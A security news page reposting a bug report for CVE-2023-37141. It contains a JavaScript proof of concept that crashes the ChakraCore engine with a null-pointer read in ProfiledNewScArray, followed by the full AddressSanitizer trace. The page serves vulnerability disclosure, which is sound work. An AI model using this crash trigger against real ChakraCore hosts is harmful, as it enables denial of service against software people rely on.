Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-37141: SEGV (/root/ChakraCore-latest/out/Release/ch+0xe248a5) in Js::ProfilingHelpers::ProfiledNewScArray(unsigned int, Js::FunctionBody*, unsigned short) · Issue #6886 · chakra-core/ChakraCore

ChakraCore branch master cbb9b was discovered to contain a segmentation violation via the function Js::ProfilingHelpers::ProfiledNewScArray().

CVE
Open in Source
#linux#js#java#amd

Branch: master
Commit: cbb9b101d18e4c1682ca39a52a201d8e4241ea17
POC is:

function attach(f) {
  (function (r) {
    WScript.Attach(r);
  })(f);
}

async function mainTest(notAttachCall) {
    if (notAttachCall) {
        for (let i = 0; i < 1; []) {
            await attach(mainTest);
        }
    } else {
        var i = 10;/**bp:locals()**/
    }
}
mainTest(true);
WScript.Echo("PASSED");

In release build,
./build.sh --sanitize=address --static -j
I get:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==10344==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55cae7e6e8a6 bp 0x7ffe4b5e4470 sp 0x7ffe4b5e4440 T0)
==10344==The signal is caused by a READ memory access.
==10344==Hint: address points to the zero page.
    #0 0x55cae7e6e8a5 in Js::ProfilingHelpers::ProfiledNewScArray(unsigned int, Js::FunctionBody*, unsigned short) (/root/ChakraCore-latest/out/Release/ch+0xe248a5)
    #1 0x55cae7ac0ca8 in Js::InterpreterStackFrame::ProcessWithDebugging() (/root/ChakraCore-latest/out/Release/ch+0xa76ca8)
    #2 0x55cae7a9bb77 in Js::InterpreterStackFrame::DebugProcess() (/root/ChakraCore-latest/out/Release/ch+0xa51b77)
    #3 0x55cae7a9a981 in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa50981)
    #4 0x55cae7a998ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
    #5 0x7f6a4d020f99  (<unknown module>)
    #6 0x55cae8384ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #7 0x55cae776965a in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f65a)
    #8 0x55cae8384ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #9 0x55cae80102d5 in Js::JavascriptGenerator::CallGenerator(void*, Js::ResumeYieldKind) (/root/ChakraCore-latest/out/Release/ch+0xfc62d5)
    #10 0x55cae8384ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #11 0x55cae7769446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #12 0x55cae7fcf1dc in Js::JavascriptAsyncFunction::AsyncSpawnStep(Js::JavascriptAsyncSpawnStepFunction*, Js::JavascriptGenerator*, void*, void*) (/root/ChakraCore-latest/out/Release/ch+0xf851dc)
    #13 0x55cae7fcf9eb in Js::JavascriptAsyncFunction::EntryAsyncSpawnCallStepFunction(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xf859eb)
    #14 0x55cae8384ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #15 0x55cae7769446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #16 0x55cae82415ee in Js::JavascriptPromise::EntryReactionTaskFunction(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x11f75ee)
    #17 0x55cae8384ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #18 0x55cae776b31a in Js::ScriptContext::ProfileModeThunk_DebugModeWrapper(Js::JavascriptFunction*, Js::ScriptContext*, void* (*)(Js::RecyclableObject*, Js::CallInfo, ...), Js::Arguments&) (/root/ChakraCore-latest/out/Release/ch+0x72131a)
    #19 0x55cae776936d in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f36d)
    #20 0x55cae8384ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #21 0x55cae8000a61 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb6a61)
    #22 0x55cae800072f in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb672f)
    #23 0x55cae74f975a in JsCallFunction (/root/ChakraCore-latest/out/Release/ch+0x4af75a)
    #24 0x55cae7421b1a in WScriptJsrt::CallbackMessage::CallFunction(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3d7b1a)
    #25 0x55cae73fe804 in RunScript(char const*, char const*, unsigned long, void (*)(void*), void*, char*, void*) (/root/ChakraCore-latest/out/Release/ch+0x3b4804)
    #26 0x55cae7401913 in ExecuteTest(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3b7913)
    #27 0x55cae7402606 in main (/root/ChakraCore-latest/out/Release/ch+0x3b8606)
    #28 0x7f6a5151cc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    #29 0x55cae7300d59 in _start (/root/ChakraCore-latest/out/Release/ch+0x2b6d59)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/root/ChakraCore-latest/out/Release/ch+0xe248a5) in Js::ProfilingHelpers::ProfiledNewScArray(unsigned int, Js::FunctionBody*, unsigned short)
==10344==ABORTING

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE